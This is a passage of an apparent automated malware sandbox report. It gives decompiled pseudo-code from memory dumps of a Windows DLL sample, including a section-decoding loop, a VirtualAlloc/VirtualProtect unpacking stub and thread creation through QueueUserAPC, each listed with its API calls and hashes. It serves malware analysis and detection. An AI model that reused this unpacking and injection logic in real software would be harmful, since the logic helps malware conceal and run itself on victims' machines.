                  0x03056567
                  0x0305656e
                  0x03056574
                  0x03056575
                  0x03056586
                  0x03056590
                  0x03056593
                  0x0305659a
                  0x0305659e
                  0x030565a1
                  0x030565a9
                  0x030565b0
                  0x030565b6
                  0x030565b7
                  0x030565ca
                  0x030565cc
                  0x030565ce
                  0x030565d2
                  0x030565d5
                  0x030565db
                  0x030565e5
                  0x030565e8
                  0x030565ee
                  0x030565f6
                  0x030565fd
                  0x03056603
                  0x0305660b
                  0x03056610
                  0x03056618
                  0x0305661b
                  0x03056622
                  0x03056625
                  0x0305662b
                  0x03056632
                  0x03056635
                  0x0305663c
                  0x03056640
                  0x03056643
                  0x0305664a
                  0x0305664e
                  0x03056651
                  0x03056659
                  0x0305665f
                  0x03056666
                  0x03056667
                  0x0305666a
                  0x0305666b
                  0x03056671
                  0x03056674
                  0x03056677
                  0x0305667a
                  0x03056685
                  0x0305668f
                  0x03056693
                  0x03056696
                  0x0305669d
                  0x030566a0
                  0x030566a3
                  0x030566a3
                  0x030566a9
                  0x030566ac
                  0x030566af
                  0x030566c2
                  0x030566c6
                  0x030566c9
                  0x030566d2
                  0x030566dc
                  0x030566e8
                  0x030566eb
                  0x030566f1
                  0x030566f8
                  0x030566fe
                  0x03056703
                  0x03056706
                  0x0305670b
                  0x0305670e
                  0x03056713
                  0x0305671a
                  0x0305671d
                  0x03056720
                  0x03056727
                  0x03056730
                  0x0305673a
                  0x0305673d
                  0x03056743
                  0x0305674d
                  0x03056757
                  0x0305675b
                  0x0305675e
                  0x0305676d
                  0x03056774
                  0x03056777
                  0x0305677a
                  0x0305677d
                  0x0305677e
                  0x0305677f
                  0x03056781
                  0x0305678c
                  0x03056791
                  0x0305679a
                  0x0305679d
                  0x030567a7
                  0x030567ab
                  0x030567ae
                  0x030567b4
                  0x030567b6
                  0x030567bd
                  0x030567c3
                  0x030567c4
                  0x030567c7
                  0x030567cc
                  0x030567cf
                  0x030567d2
                  0x030567d2
                  0x030567d3
                  0x030567dd
                  0x030567e0
                  0x030567e7
                  0x030567f1
                  0x030567f4
                  0x030567f7
                  0x030567fe
                  0x03056801
                  0x0305680b
                  0x0305680f
                  0x03056812
                  0x0305681d
                  0x03056824
                  0x03056827
                  0x0305682a
                  0x0305682d
                  0x0305682e
                  0x0305682f
                  0x03056841
                  0x0305684c
                  0x03056858
                  0x0305685b
                  0x03056861
                  0x03056868
                  0x0305686e
                  0x03056873
                  0x03056876
                  0x0305687e
                  0x03056881
                  0x03056881
                  0x03056889
                  0x0305688d
                  0x03056897
                  0x0305689b
                  0x030568a4
                  0x030568ae
                  0x030568b1
                  0x030568bd
                  0x030568c4
                  0x030568cd
                  0x030568d0
                  0x030568d3
                  0x030568e0
                  0x030568e4
                  0x030568e7
                  0x030568f0
                  0x030568f7
                  0x03056900
                  0x03056901
                  0x03056904
                  0x03056907
                  0x03056913
                  0x03056916
                  0x03056919
                  0x03056926
                  0x0305692f
                  0x03056939
                  0x0305693c
                  0x03056945
                  0x03056951
                  0x03056954
                  0x03056960
                  0x03056968
                  0x0305696c
                  0x03056971
                  0x03056972
                  0x0305697d
                  0x0305697f
                  0x03056984
                  0x03056986
                  0x0305698d
                  0x03056990
                  0x03056993
                  0x0305699a
                  0x0305699d
                  0x030569a0
                  0x030569a6
                  0x030569ae
                  0x030569b5
                  0x030569bb
                  0x030569c0
                  0x030569c3
                  0x030569c6
                  0x030569cd
                  0x030569d0
                  0x030569d6
                  0x030569d9
                  0x030569e0
                  0x030569e4
                  0x030569e7
                  0x030569f0
                  0x030569f3
                  0x030569fb
                  0x03056a02
                  0x03056a08
                  0x03056a0b
                  0x03056a0e
                  0x03056a13
                  0x03056a1a
                  0x03056a1e
                  0x03056a24
                  0x03056a27
                  0x03056a30
                  0x03056a33
                  0x03056a3f
                  0x03056a46
                  0x03056a4f
                  0x03056a52
                  0x03056a56
                  0x03056a5d
                  0x03056a64
                  0x03056a67
                  0x03056a6e
                  0x03056a72
                  0x03056a75
                  0x03056a7c
                  0x03056a80
                  0x03056a83
                  0x03056a8a
                  0x03056a8d
                  0x03056a90
                  0x03056a9f
                  0x03056aa6
                  0x03056aa9
                  0x03056aac
                  0x03056aaf
                  0x03056ab0
                  0x03056ab3
                  0x03056abe
                  0x03056ac0
                  0x03056ac3
                  0x03056ac5
                  0x03056acc
                  0x03056acf
                  0x03056ad2
                  0x03056ad9
                  0x03056adc
                  0x03056adf
                  0x03056ae5
                  0x03056aec
                  0x03056af2
                  0x03056af2
                  0x03056af5
                  0x03056af8
                  0x03056afc
                  0x03056aff
                  0x03056b02
                  0x03056b09
                  0x03056b0c
                  0x03056b0f
                  0x03056b17
                  0x03056b1e
                  0x03056b24
                  0x03056b25
                  0x03056b2c
                  0x03056b2f
                  0x03056b35
                  0x03056b3f
                  0x03056b42
                  0x03056b49
                  0x03056b4c
                  0x03056b4f
                  0x03056b55
                  0x03056b5c
                  0x03056b62
                  0x03056b65
                  0x03056b6b
                  0x03056b71
                  0x03056b7b
                  0x03056b7e
                  0x03056b85
                  0x03056b88
                  0x03056b8b
                  0x03056b91
                  0x03056b99
                  0x03056ba0
                  0x03056ba6
                  0x03056ba6
                  0x03056baf
                  0x03056bbb
                  0x03056bc5
                  0x03056bcf
                  0x03056bd2
                  0x03056bd5
                  0x03056bdb
                  0x03056be2
                  0x03056be8
                  0x03056bf4
                  0x03056bf6
                  0x03056bfd
                  0x03056c07
                  0x03056c10
                  0x03056c17
                  0x03056c20
                  0x03056c21
                  0x03056c24
                  0x03056c27
                  0x03056c2d
                  0x03056c30
                  0x03056c3a
                  0x03056c3d
                  0x03056c40
                  0x03056c46
                  0x03056c4d
                  0x03056c59
                  0x03056c5c
                  0x03056c6b
                  0x03056c72
                  0x03056c75
                  0x03056c78
                  0x03056c7b
                  0x03056c7c
                  0x03056c7d
                  0x03056c88
                  0x03056c8a
                  0x03056c8f
                  0x03056c98
                  0x03056c9b
                  0x03056ca5
                  0x03056ca9
                  0x03056cac
                  0x03056cac
                  0x03056cb4
                  0x03056cbb
                  0x03056cc2
                  0x03056ccc
                  0x03056cd5
                  0x03056cdc
                  0x03056cdf
                  0x03056ce8
                  0x03056cf1
                  0x03056cf8
                  0x03056cfb
                  0x03056d06
                  0x03056d09
                  0x03056d10
                  0x03056d11
                  0x03056d14
                  0x03056d15
                  0x03056d1b
                  0x03056d1e
                  0x03056d21
                  0x03056d24
                  0x03056d2d
                  0x03056d30
                  0x03056d39
                  0x03056d40
                  0x03056d43
                  0x03056d43
                  0x03056d49
                  0x03056d51
                  0x03056d58
                  0x03056d63
                  0x03056d6b
                  0x03056d6d
                  0x03056d6f
                  0x03056d73
                  0x03056d7c
                  0x03056d86
                  0x03056d90
                  0x03056d93
                  0x03056d96
                  0x03056d9c
                  0x03056da4
                  0x03056dab
                  0x03056db1
                  0x03056dba
                  0x03056dc4
                  0x03056dc5
                  0x03056dc8
                  0x03056dcb
                  0x03056dce
                  0x03056dcf
                  0x03056dd0
                  0x03056dda
                  0x03056de4
                  0x03056de8
                  0x03056df1
                  0x03056dfb
                  0x03056dfe
                  0x03056e06
                  0x03056e0d
                  0x03056e13
                  0x03056e16
                  0x03056e19
                  0x03056e1c
                  0x03056e20
                  0x03056e24
                  0x03056e2e
                  0x03056e31
                  0x03056e34
                  0x03056e3b
                  0x03056e3e
                  0x03056e48
                  0x03056e4b
                  0x03056e4e
                  0x03056e5a
                  0x03056e62
                  0x03056e66
                  0x03056e6b
                  0x03056e6c
                  0x03056e72
                  0x03056e75
                  0x03056e78
                  0x03056e7b
                  0x03056e7d
                  0x03056e84
                  0x03056e87
                  0x03056e8a
                  0x03056e91
                  0x03056e94
                  0x03056e97
                  0x03056e9d
                  0x03056ea4
                  0x03056eaa
                  0x03056eaa
                  0x03056eb9
                  0x03056ec8
                  0x03056ec9
                  0x03056ec9
                  0x03056ec9
                  0x03056ed4
                  0x03056ed7
                  0x03056ee0
                  0x03056ee2
                  0x03056ee3
                  0x03056ee3
                  0x03056ee3
                  0x03056eec
                  0x03056eef
                  0x03056ef2
                  0x03056f07
                  0x03056f0a
                  0x03056f0d
                  0x03056f10
                  0x03056f11
                  0x03056f14
                  0x03056f1b
                  0x03056f21
                  0x03056f22
                  0x03056f31
                  0x03056f33
                  0x03056f39
                  0x03056f3c
                  0x03056f40
                  0x03056f43
                  0x03056f4b
                  0x03056f4e
                  0x03056f4e
                  0x03056f61
                  0x03056f68

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
                  • Instruction ID: bc6ef97058f38e378168804a1aca60f33b776361b891661bd633a17fe353405c
                  • Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
                  • Instruction Fuzzy Hash: 6CC21472844608EFEB049FA0C8C57EEBBF5FF48320F0989ADD899AA145D7345264CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                  				long _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				char _t9;
                  				void* _t10;
                  				void* _t18;
                  				void* _t23;
                  				void* _t36;
                  
                  				_push(__ecx);
                  				_t9 = _a8;
                  				_v8 = 1;
                  				if(_t9 == 0) {
                  					_t10 = InterlockedDecrement(0x10004108);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						__eflags =  *0x1000410c;
                  						if( *0x1000410c != 0) {
                  							_t36 = 0x2328;
                  							while(1) {
                  								SleepEx(0x64, 1);
                  								__eflags =  *0x10004118;
                  								if( *0x10004118 == 0) {
                  									break;
                  								}
                  								_t36 = _t36 - 0x64;
                  								__eflags = _t36;
                  								if(_t36 > 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							CloseHandle( *0x1000410c);
                  						}
                  						HeapDestroy( *0x10004110);
                  					}
                  				} else {
                  					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
                  						_t18 = HeapCreate(0, 0x400000, 0); // executed
                  						_t41 = _t18;
                  						 *0x10004110 = _t18;
                  						if(_t18 == 0) {
                  							L6:
                  							_v8 = 0;
                  						} else {
                  							 *0x10004130 = _a4;
                  							asm("lock xadd [eax], edi");
                  							_push( &_a8);
                  							_t23 = E100012DC(E1000111A, E100015EE(_a12, 1, 0x10004118, _t41));
                  							 *0x1000410c = _t23;
                  							if(_t23 == 0) {
                  								asm("lock xadd [esi], eax");
                  								goto L6;
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}












                  0x10001afd
                  0x10001b09
                  0x10001b0b
                  0x10001b0e
                  0x10001b84
                  0x10001b8a
                  0x10001b8c
                  0x10001b8e
                  0x10001b94
                  0x10001b96
                  0x10001b9b
                  0x10001b9e
                  0x10001ba9
                  0x10001bab
                  0x00000000
                  0x00000000
                  0x10001bad
                  0x10001bb0
                  0x10001bb2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10001bb2
                  0x10001bba
                  0x10001bba
                  0x10001bc6
                  0x10001bc6
                  0x10001b10
                  0x10001b11
                  0x10001b31
                  0x10001b37
                  0x10001b39
                  0x10001b3e
                  0x10001b7a
                  0x10001b7a
                  0x10001b40
                  0x10001b48
                  0x10001b4f
                  0x10001b59
                  0x10001b65
                  0x10001b6c
                  0x10001b71
                  0x10001b76
                  0x00000000
                  0x10001b76
                  0x10001b71
                  0x10001b3e
                  0x10001b11
                  0x10001bd3

                  APIs
                  • InterlockedIncrement.KERNEL32(10004108), ref: 10001B1C
                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001B31
                    • Part of subcall function 100012DC: CreateThread.KERNEL32 ref: 100012F3
                    • Part of subcall function 100012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001308
                    • Part of subcall function 100012DC: GetLastError.KERNEL32(00000000), ref: 10001313
                    • Part of subcall function 100012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 1000131D
                    • Part of subcall function 100012DC: CloseHandle.KERNEL32(00000000), ref: 10001324
                    • Part of subcall function 100012DC: SetLastError.KERNEL32(00000000), ref: 1000132D
                  • InterlockedDecrement.KERNEL32(10004108), ref: 10001B84
                  • SleepEx.KERNEL32(00000064,00000001), ref: 10001B9E
                  • CloseHandle.KERNEL32 ref: 10001BBA
                  • HeapDestroy.KERNEL32 ref: 10001BC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                  • String ID:
                  • API String ID: 2110400756-0
                  • Opcode ID: b2735cd62b98c0fff9eadb96ecfab59fc7d8990f65d57987f5a6912bdf7ccd39
                  • Instruction ID: f0df8185a4137bf23340b4e7eb087222ae8a4cbb436f36e741c86f19ce9e809b
                  • Opcode Fuzzy Hash: b2735cd62b98c0fff9eadb96ecfab59fc7d8990f65d57987f5a6912bdf7ccd39
                  • Instruction Fuzzy Hash: 922190B5601216AFF701DF69CCC4ACA7FE8FB642E07128129FA05D3168EB708D808B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E100012DC(long _a4, DWORD* _a12) {
                  				_Unknown_base(*)()* _v0;
                  				void* _t4;
                  				long _t6;
                  				long _t11;
                  				void* _t13;
                  
                  				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x1000414c, 0, _a12); // executed
                  				_t13 = _t4;
                  				if(_t13 != 0) {
                  					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                  					if(_t6 == 0) {
                  						_t11 = GetLastError();
                  						TerminateThread(_t13, _t11);
                  						CloseHandle(_t13);
                  						_t13 = 0;
                  						SetLastError(_t11);
                  					}
                  				}
                  				return _t13;
                  			}








                  0x100012f3
                  0x100012f9
                  0x100012fd
                  0x10001308
                  0x10001310
                  0x10001319
                  0x1000131d
                  0x10001324
                  0x1000132b
                  0x1000132d
                  0x10001333
                  0x10001310
                  0x10001337

                  APIs
                  • CreateThread.KERNEL32 ref: 100012F3
                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001308
                  • GetLastError.KERNEL32(00000000), ref: 10001313
                  • TerminateThread.KERNEL32(00000000,00000000), ref: 1000131D
                  • CloseHandle.KERNEL32(00000000), ref: 10001324
                  • SetLastError.KERNEL32(00000000), ref: 1000132D
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                  • String ID:
                  • API String ID: 3832013932-0
                  • Opcode ID: f944589a858edab2219560e62326191baa7f7a8351923321239c7166ab578a1d
                  • Instruction ID: 31004d63c2960ea31e2c824d7a0ae826113ff2aaace5ecc64d275acbf5e6dd3f
                  • Opcode Fuzzy Hash: f944589a858edab2219560e62326191baa7f7a8351923321239c7166ab578a1d
                  • Instruction Fuzzy Hash: AAF0F232606631FBF6139BA08C98F9FBBADFB08BD1F01C404FA1591168CB3189109BA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E100018F4(void* __edi, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				unsigned int _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				signed int _v44;
                  				signed int _v48;
                  				intOrPtr _t39;
                  				void* _t46;
                  				intOrPtr _t47;
                  				intOrPtr _t50;
                  				signed int _t59;
                  				signed int _t61;
                  				intOrPtr _t66;
                  				intOrPtr _t77;
                  				void* _t78;
                  				signed int _t80;
                  
                  				_t77 =  *0x10004130;
                  				_t39 = E10001F5D(_t77,  &_v20,  &_v12);
                  				_v16 = _t39;
                  				if(_t39 == 0) {
                  					asm("sbb ebx, ebx");
                  					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                  					_t78 = _t77 + _v20;
                  					_v36 = _t78;
                  					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                  					_v24 = _t46;
                  					if(_t46 == 0) {
                  						_v16 = 8;
                  					} else {
                  						_t61 = 0;
                  						if(_t59 <= 0) {
                  							_t47 =  *0x1000414c;
                  						} else {
                  							_t66 = _a4;
                  							_t50 = _t46 - _t78;
                  							_t11 = _t66 + 0x100051a7; // 0x100051a7
                  							_v28 = _t50;
                  							_v32 = _t50 + _t11;
                  							_v8 = _t78;
                  							while(1) {
                  								asm("movsd");
                  								asm("movsd");
                  								asm("movsd");
                  								_t19 = _t61 + 1; // 0x2
                  								_t80 = _t19;
                  								E100018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                  								_t64 = _v32;
                  								_v8 = _v8 + 0x1000;
                  								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                  								_t61 = _t80;
                  								 *0x1000414c = _t47;
                  								if(_t61 >= _t59) {
                  									break;
                  								}
                  								_t50 = _v28;
                  							}
                  						}
                  						if(_t47 != 0x63699bc3) {
                  							_v16 = 0xc;
                  						} else {
                  							memcpy(_v36, _v24, _v12);
                  						}
                  						VirtualFree(_v24, 0, 0x8000); // executed
                  					}
                  				}
                  				return _v16;
                  			}























                  0x100018fb
                  0x1000190b
                  0x10001912
                  0x10001915
                  0x1000192a
                  0x10001931
                  0x10001936
                  0x10001947
                  0x1000194a
                  0x10001952
                  0x10001955
                  0x100019ff
                  0x1000195b
                  0x1000195b
                  0x1000195f
                  0x100019c7
                  0x10001961
                  0x10001961
                  0x10001964
                  0x10001966
                  0x1000196e
                  0x10001971
                  0x10001974
                  0x1000197c
                  0x10001984
                  0x10001985
                  0x10001986
                  0x1000198d
                  0x1000198d
                  0x100019a1
                  0x100019a6
                  0x100019af
                  0x100019b6
                  0x100019b9
                  0x100019bd
                  0x100019c2
                  0x00000000
                  0x00000000
                  0x10001979
                  0x10001979
                  0x100019c4
                  0x100019d1
                  0x100019e6
                  0x100019d3
                  0x100019dc
                  0x100019e1
                  0x100019f7
                  0x100019f7
                  0x10001a06
                  0x10001a0c

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,1000167D,00003000,00000004,?,?,1000167D,00000000), ref: 1000194A
                  • memcpy.NTDLL(?,?,1000167D,?,?,1000167D,00000000), ref: 100019DC
                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,1000167D,00000000), ref: 100019F7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: Virtual$AllocFreememcpy
                  • String ID: Mar 9 2021
                  • API String ID: 4010158826-2159264323
                  • Opcode ID: 7b4b9413683c0ee93ca57d36818f05a47077ad882414d040b2bcd6576e39adc5
                  • Instruction ID: d25fb31f2c2add74eafa799964551cc2416acfdb7abcc9e218ddf36d438f9e1f
                  • Opcode Fuzzy Hash: 7b4b9413683c0ee93ca57d36818f05a47077ad882414d040b2bcd6576e39adc5
                  • Instruction Fuzzy Hash: 4D315271E0111A9FEB01CF99C891ADEBBF5EF48384F108169E904A7259D771AA45CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E1000111A(void* __ecx, char _a4) {
                  				long _t3;
                  				int _t4;
                  				int _t9;
                  				void* _t13;
                  
                  				_t13 = GetCurrentThread();
                  				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                  				if(_t3 != 0) {
                  					SetThreadPriority(_t13, 0xffffffff); // executed
                  				}
                  				_t4 = E1000163F(_a4); // executed
                  				_t9 = _t4;
                  				if(_t9 == 0) {
                  					SetThreadPriority(_t13, _t4);
                  				}
                  				asm("lock xadd [eax], ecx");
                  				return _t9;
                  			}







                  0x10001123
                  0x10001128
                  0x10001136
                  0x1000113b
                  0x1000113b
                  0x10001141
                  0x10001146
                  0x1000114a
                  0x1000114e
                  0x1000114e
                  0x10001158
                  0x10001161

                  APIs
                  • GetCurrentThread.KERNEL32 ref: 1000111D
                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001128
                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000113B
                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 1000114E
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: Thread$Priority$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1452675757-0
                  • Opcode ID: c35cabef654aae5fe09134992651e52fd0a70a53666a0e792eef5a60e0c71ab1
                  • Instruction ID: 4c0cec3966cfd65f316416e497d44ff5eb1b0779e4299dd3e4543c5f6ab01fef
                  • Opcode Fuzzy Hash: c35cabef654aae5fe09134992651e52fd0a70a53666a0e792eef5a60e0c71ab1
                  • Instruction Fuzzy Hash: 91E092712066216BF302AB294C85EEB679DDF953F0B028225F620D22E8CF659D0286A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0305709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
                  				void* _t47;
                  				signed int _t48;
                  				signed int _t49;
                  				void* _t51;
                  				void* _t52;
                  				void* _t54;
                  				void* _t55;
                  				signed int _t59;
                  				long _t60;
                  				void* _t62;
                  				void* _t65;
                  				void* _t67;
                  				signed int _t68;
                  				void* _t72;
                  				signed int _t75;
                  				signed int _t78;
                  				void* _t81;
                  				signed int _t82;
                  				long _t87;
                  				signed int _t89;
                  				long _t94;
                  				void* _t97;
                  				void* _t99;
                  				long _t101;
                  				void* _t102;
                  
                  				_t87 = __esi;
                  				_t79 = __edi;
                  				_t72 = __edx;
                  				_t59 = __ebx;
                  				 *_t101 = 0xffff0000;
                  				_t48 = E03052D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
                  				 *_t101 =  *_t101 | _t59;
                  				_t60 = _t59;
                  				if( *_t101 != 0) {
                  					 *_t101 =  *_t101 + 4;
                  					 *_t101 =  *_t101 - _t94;
                  					 *_t101 =  *_t101 + 0x1000;
                  					 *_t101 =  *_t101 - _t60;
                  					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
                  					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
                  				}
                  				 *(_t94 - 8) = 0;
                  				_push( *(_t94 - 8));
                  				 *_t101 =  *_t101 ^ _t48;
                  				_pop( *_t6);
                  				 *(_t60 + 0x41c60a) = 2;
                  				 *_t101 = _t94;
                  				 *(_t60 + 0x41d10e) = _t48;
                  				_t97 = 0;
                  				if( *(_t60 + 0x41c166) > 0) {
                  					_t55 = _t60 + 0x41c60a;
                  					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
                  					 *_t101 = _t55 +  *_t101;
                  					 *_t101 = 0x40;
                  					_t87 =  *_t101;
                  					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
                  					 *_t101 =  *(_t60 + 0x41c166);
                  					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
                  				}
                  				_push(_t72);
                  				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  				_t89 = _t87;
                  				_push(_t72);
                  				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
                  				_t99 = _t97;
                  				_t49 = E0305746C(_t60, _t72, _t79, _t89);
                  				_push( *((intOrPtr*)(_t60 + 0x41c627)));
                  				_pop( *_t24);
                  				_push( *(_t99 - 8));
                  				_pop(_t62);
                  				 *_t101 = _t62;
                  				_t65 = 0;
                  				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
                  				_t81 = _t67;
                  				_t68 = _t65;
                  				if(_t67 != 0) {
                  					 *(_t99 - 8) = 0;
                  					 *_t101 =  *_t101 ^ _t81;
                  					_t49 = E03052A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
                  				}
                  				_t75 = _t72;
                  				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
                  				_t102 = _t101 + 0xc;
                  				_t82 = _t81 + _t68;
                  				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
                  					_push(0);
                  					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  					_t82 = _t82; // executed
                  					_t52 = E03055F16(_t51, _t60, 0, _t75, _t89); // executed
                  					_push(_t52);
                  					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  					_t54 = _t52;
                  					_t51 = E03058F3B(_t54, _t60, 0, _t75, _t82, _t89);
                  				}
                  				 *(_t99 - 4) = _t82;
                  				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
                  				 *_t41 =  *(_t60 + 0x41d140);
                  				_t78 =  *(_t99 - 8);
                  				_push(_t89);
                  				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
                  				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
                  				asm("popad");
                  				return _t51;
                  			}




























                  0x0305709d
                  0x0305709d
                  0x0305709d
                  0x0305709d
                  0x0305709e
                  0x030570a5
                  0x030570ab
                  0x030570ae
                  0x030570af
                  0x030570b2
                  0x030570b6
                  0x030570ba
                  0x030570c1
                  0x030570cb
                  0x030570d0
                  0x030570d0
                  0x030570d6
                  0x030570dd
                  0x030570e0
                  0x030570e3
                  0x030570e9
                  0x030570f5
                  0x030570fc
                  0x03057102
                  0x0305710a
                  0x0305710c
                  0x03057112
                  0x03057119
                  0x0305711d
                  0x0305712b
                  0x0305712b
                  0x03057135
                  0x03057138
                  0x03057138
                  0x0305713e
                  0x03057146
                  0x0305714a
                  0x0305714b
                  0x03057153
                  0x03057157
                  0x03057158
                  0x0305715d
                  0x03057163
                  0x03057166
                  0x03057169
                  0x0305716c
                  0x03057179
                  0x0305717d
                  0x0305717f
                  0x03057181
                  0x03057182
                  0x03057184
                  0x0305718e
                  0x03057191
                  0x03057191
                  0x0305719d
                  0x0305719e
                  0x0305719e
                  0x0305719e
                  0x030571a6
                  0x030571a8
                  0x030571b0
                  0x030571b4
                  0x030571b5
                  0x030571ba
                  0x030571c2
                  0x030571c6
                  0x030571c7
                  0x030571c7
                  0x030571cc
                  0x030571e0
                  0x030571ea
                  0x030571f0
                  0x030571f1
                  0x030571f7
                  0x030571fb
                  0x030571ff
                  0x03057201

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000), ref: 030570D0
                  • VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 03057138
                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID: Virtual$AllocProtect
                  • String ID:
                  • API String ID: 2447062925-0
                  • Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
                  • Instruction ID: ac7ff82eb248228f2ca585bc320e4d1ebd6b1b532077cf6f6015c2af17029c65
                  • Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
                  • Instruction Fuzzy Hash: 89417072905304EFEB04DF54C885BAEBBF5EF88710F09845DEC88AB245C7705950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000135A() {
                  				char _v16;
                  				intOrPtr _v28;
                  				void _v32;
                  				void* _v36;
                  				intOrPtr _t15;
                  				void* _t16;
                  				void* _t24;
                  				long _t25;
                  				int _t26;
                  				intOrPtr* _t32;
                  				signed int _t36;
                  				intOrPtr _t39;
                  
                  				_t15 =  *0x10004150;
                  				if( *0x1000412c > 5) {
                  					_t16 = _t15 + 0x100050f9;
                  				} else {
                  					_t16 = _t15 + 0x100050b1;
                  				}
                  				E10001FE7(_t16, _t16);
                  				_t36 = 6;
                  				memset( &_v32, 0, _t36 << 2);
                  				_t24 = E10001414( &_v32,  &_v16,  *0x1000414c ^ 0xfd7cd1cf); // executed
                  				if(_t24 == 0) {
                  					_t25 = 0xb;
                  				} else {
                  					_t26 = lstrlenW( *0x10004138);
                  					_t8 = _t26 + 2; // 0x2
                  					_t11 = _t26 + _t8 + 8; // 0xa
                  					if(E1000102F(_t39, _t11,  &_v32,  &_v36) == 0) {
                  						_t32 = _v36;
                  						 *_t32 = 0;
                  						if( *0x10004138 == 0) {
                  							 *((short*)(_t32 + 4)) = 0;
                  						} else {
